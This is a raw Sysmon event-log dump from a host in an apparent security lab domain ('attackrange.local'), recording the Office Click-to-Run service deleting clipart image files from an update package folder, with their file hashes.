Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0186346.WMFMD5=C754734657860291B6BD3BF66F45FA35,SHA256=4E8A0701822A94A86A11BBB2BDA6D8BE640277AE3644565E3B0FFE9F8E193FFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185842.WMFMD5=C6DB2A90A079B2F40C8033447C1B63EC,SHA256=BD1A24ECACAF5ECF515E5AEE2B7309229861A8F4975E450A31DE3A665D023C53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185834.WMFMD5=A4E451D6289C072FEB35A396651872F1,SHA256=AA506656D107B281AEECF023B70E7C663861E8E47B1C1C3FB22F2A234333C842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185828.WMFMD5=19E397BF20E1E1CBA9085025B7BF3446,SHA256=BA4B35684E3B232705B45271C06E95FB775EB3F562AB7E469BE1815D88FE0339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185818.WMFMD5=4903E93EED942D2074DD23806AB0069D,SHA256=157717A8D5799CD6CA638F9C33835AF0E3E14F7E5761E3623AEA598C3B64101B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185806.WMFMD5=4E97F069C5B55E4246527FB11E645CC7,SHA256=B4D9009294701A80864A1F242280BDE904796C772FE4BB239EA05D3E2CDE2C8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185800.WMFMD5=83AFD421ED6782D6D812181EC76A2725,SHA256=9B4C471326CECFB6D01353E7C3E7634A6519DD60E3462FB9C532C99916D82391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185798.WMFMD5=2A47047DCBEA882FBE85EB407B77C172,SHA256=0D47FE98974DE1407F014CA563B148F4C8002D447E5843787E56C9FB4F2B8E65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185796.WMFMD5=DC1D1C375C9B2CFA7D3F19762900488C,SHA256=237CA0F94DAECFD4D3D07322474DCB0A63B752087035E714D41A0ECF9936BF0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185790.WMFMD5=59626E498F9114AEFB1FF02EA350FE5D,SHA256=1C0AC02555973C7A983CFBF6C31CCA0400DACEEC08EF0E2C0F89B4A83193FEB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185786.WMFMD5=362335E4716C095F916E0098DD331DE5,SHA256=63809D559D7C8A325463EADB249F7EC0F5F46DE4478178AB0E7B83DBF8417E1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185780.WMFMD5=D8F6506F4718049186347FD7540FA04B,SHA256=6BF361B05170AA82AB1C7815C4EAC68A4D212ACCA0409B66C09E4A70B33FFBA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185778.WMFMD5=B916796FD9C5A3EFE3C28E904B39E497,SHA256=94345028C4521954D56712A10017456110E06197CAE80641CB27B6DDB9274B78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185776.WMFMD5=92F09C81F109FAAF6CDD20A65827AC0B,SHA256=929EAA9F9ABF0B05D4A60D73B04138C1B21C808D8572D7920F35AA3201F5AFE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185774.WMFMD5=D85F9C0B398A5809723564F1AA11FC3D,SHA256=61F5D7B7A72E8F9773BF660099811C57783AF579E40D8B731E57BC427B61AA62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0185670.WMFMD5=6375881CED1280DA7C8090976CCE7334,SHA256=8813503D43C0B36AB19C220EDC78D27DE81176D8DB555C2BEE9CFDEECABFFFE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0183574.WMFMD5=463E63644ECC87D9857386CC466C6125,SHA256=6F3D8E48B1A7D57E572DC6B5E97A89F7217EA02EE0187AE9A6E62122A4393917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0183198.WMFMD5=05879D8EB3A6C3F17B8377D92CB1BC43,SHA256=2774D2B9B261D4FA6E21DCF5922DFA2E1BD7DB079D2923322BE066EFF4F91E15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0183174.WMFMD5=BC48AA8DB7D45902C7E3133135DF74E1,SHA256=D65EB1AC864CE85F478159B2E6026FAEF5456AB77D66D04334CC619167B84957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0183172.WMFMD5=D19112716B1B32BAAD5DBD5DC6D8B31A,SHA256=711B27FC856127C27800B1502277D2A29CCB0B34275C7A6E2BD586BA9273162A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0182946.WMFMD5=A94ADCD0B36FF528F9179C8ACD29D9F3,SHA256=07555C99D7B0B4EAED87D3F24DD4F04318E7068030078029BEDF6895E26FA08C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0182902.WMFMD5=B21C9672C0838A6FB3F3082AA47E8643,SHA256=3D7039012708BCC0889AB4169D494AE05FFAA352D1062E471EE64DA409D6C6F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0182898.WMFMD5=DE050FC7895F05894D840F00771350DF,SHA256=7E8626B2729105AFE71655F268C447C0731044701D9F4474A9F05C0619DDEB64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0182888.WMFMD5=671A471E46BD1624677D32AB2EE63FAF,SHA256=0CDA3E5568A3F06E19B2E362C8D6ECC19B3AA7EAE58E824507ECFEB1670E0497,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0182689.JPGMD5=3DEE3E01F5B050C305ADB92030BE6364,SHA256=F60C594A7EC3AB8669CCEC99E6CCB4451E4642F5D7D7B3FB83D245B65C60DAE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0179963.JPGMD5=6614C6633032B406313E3D96119FF75A,SHA256=95BCB3F7F3BCDD3F4EBF5500D8AAFCBD269AEFFBB088555C344F48E6445F3480,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0178932.JPGMD5=636A3123FB636C29FAF3547A10163C35,SHA256=644ED323406B7CA96EFC75E4EDB20F09D2A376EF37B7EBABFC413799C886AD07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0178639.JPGMD5=FA1189A0B6AA8AAC273F2FCE96F9A674,SHA256=75B48CA4BEB6CC0F8A3F4DD35676C8E40A710F9AE57D22A429AE32FAEB03AE42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0178632.JPGMD5=6A0FC41F26E2D2C09B92AA918F189B25,SHA256=D688B8CE49529FD1F6821067116E301F22CBB872FB45BA7BC4C4F1F916F4CF31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0178523.JPGMD5=32B02BB4B9D99017E3658E87C67B60A5,SHA256=5ED01C960F96E225FFE0B552018AEE6CF82207F7639F010C506ECF3CE74E802E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0178460.JPGMD5=ED5D6209A139E277518573AB0944EB7A,SHA256=EBA3EA8C86497CCC423E906B9EC123C02690904B4443700CB0F8DB0CE323294D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0178459.JPGMD5=369E97ABE816A5998BCBA306111AABC2,SHA256=DAE257DE62D950811BFA3B1F92E2B2D5F621764E18EE3CE7FEAF63F72925FE5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0178348.JPGMD5=8287586B355E4126D5ED4E897881D21D,SHA256=5C9EAE4D5628BAB3D517B3378D9C13A29438624466D31EB14497B59CA75A84FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0177806.JPGMD5=FF452C0A572D1436985DA3A724449B26,SHA256=596635982F49B1F83105A5D4D688C24DC6CF614018C8A3A7AC87373C17F86887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0177257.JPGMD5=3F935DBA5D532383A49D0AF12D21DA5A,SHA256=24FADB44E951EA1F031039E4BAFF65D1E63AF990B008137AB7B3B4416AD8FD63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0175428.JPGMD5=BB89B53AD0C6926D2C1CD52E89672E74,SHA256=4ED6C9875AFA52D1B19C38F2DB4A67AA15991CE4256CAC979EE7ECB1A8B89A45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0175361.JPGMD5=8EEEF4C93A7185DE4F2945F2D571EB1D,SHA256=CA23FAAD385A0B9007D596F4E7A2520A7E7D4EBEE6DA2CA70C1277FE533FD81D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0174952.JPGMD5=07593F38C88BE6CEB23FD8C804E3E8E5,SHA256=1762825E5D841804023FFE8AA4F627A4A07C43C09021C39836EE24AEFE008881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0174639.WMFMD5=AF61A915FA39A8FB28C05DB73187AAE2,SHA256=93A8BAFEB6087FD07422E5CD3D801A618DF7FFF9C04C26F7C6F36B0DF1B689F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0174635.WMFMD5=E7FC5E99FB2FF2588F5AAD27DE9D2BEF,SHA256=B0A8FBB613363DBCE9BF63C017C3E4EE0D00BF200BCEFEC1F2236E09C2DFFFAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0174315.WMFMD5=B1CBE583095FDC90948DEAE15F6FDFD6,SHA256=1636B2C2B0200C0686AC5C644CAD4A9CFA0A155D0379D013D7C8886DC6C7D7FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0172193.WMFMD5=3B7F00F846AABBA679B10C41814FE15D,SHA256=CEE48EDE2D0BE8B84D54F046A3B537407CDC8A6FD5D05C2674AE751A8AEAC199,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0172067.WMFMD5=8696854C05E885CCE618BDF50E0E21E4,SHA256=36CA7AC78F538A4F14884F56990DEA29B741CF92A3200767BD30BF5928E33EA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0172035.WMFMD5=B5E6ABD9033A377FAE5DDAC413E96ABD,SHA256=950D483519CEB311E054AC2126C1F194F22B429DD8BF13D476D670A0BBE4570F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0171847.WMFMD5=AC78274061C7FF3104B7A31C7488A9CA,SHA256=071E8010C79F560F3C88B85947F10D83D3623D10B0150D7C248BBA45B8B32CED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 